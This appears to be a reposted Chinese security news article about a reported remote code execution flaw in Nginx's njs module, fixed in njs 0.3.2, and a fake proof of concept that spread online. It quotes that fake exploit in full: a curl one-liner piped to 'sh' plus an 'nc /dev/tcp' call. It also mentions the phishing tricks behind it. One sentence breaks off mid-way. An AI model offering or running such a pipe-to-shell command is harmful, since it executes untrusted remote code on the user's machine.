Nginx的njs插件被爆远程代码执行漏洞，务必警惕网上假poc

njs 是 JavaScript/ECMAscript 的子集 。它实现了大部分的 JavaScript 语言的功能，没有完全遵从 ECMAScript 标准，同时抛弃了 JavaScript 比较难懂的部分。njs 不是通过 V8 引擎实现的，而是通过一个更小、能耗更低、更符合 Nginx 应用场景的小虚拟机（VM）来实现，可以理解为 Nginx 为其实现了一套自己的词法解析。

njs 是以 Nginx 插件的方式存在，名字就叫：njs 。和其他 Nginx 插件一样，我们需要重新编译 Nginx 来完成安装。

而在近日，njs插件被安全研究员Alisa Shevchenko

Nginx 也在回复中声明，ZDI-CAN-8296 was fixed in the nJS 0.3.2 release。

并附带了两个链接。

也就是下面这个github issues中提到的问题，从中也许你们可以找到一些线索去发现和构造。

https://github.com/nginx/njs/issues/131

热心网友甚至还给出了patch方法

https://github.com/nginx/njs/issues/159

由于Nginx在自2009年以来的，仅发现了大约20个漏洞，其中没有一个RCE漏洞。

因此导致此次事件的关注程度在web安全界的得到了轰炸。

甚至不亚于CVE-2019-0708的火爆程度

因此，戏精再次出现，外网一位安全研究员发布了一个POC。

然后该条推文得到了疯狂转发。

再转发得到600多量后，作者发布了一篇文章。

https://medium.com/@notdan/curl-slight-of-hand-exploit-hysteria-29a82e5851d

文章里面完全披露了他是如何构造一个假的poc从开玩笑

同时，他也解释了这条语句的含义，黑鸟还是从中学到了一些技巧，也算是感谢他这波教你做人了。

curl -gsS (link: https://victim.server.here:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00) victim.server.here/../../../%00/n…\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

除此之外，还教导了一些钓鱼的思路，也是很骚，怪不得能钓到这么多人，也是奇才。

不过恐怕，昨天的流传POC已经出现，说的就是这个玩意吧。

再次强调：目前公开渠道并未披露任何细节（除Gayhub外）。

本文转自公众号：黑鸟，如需转载请标明。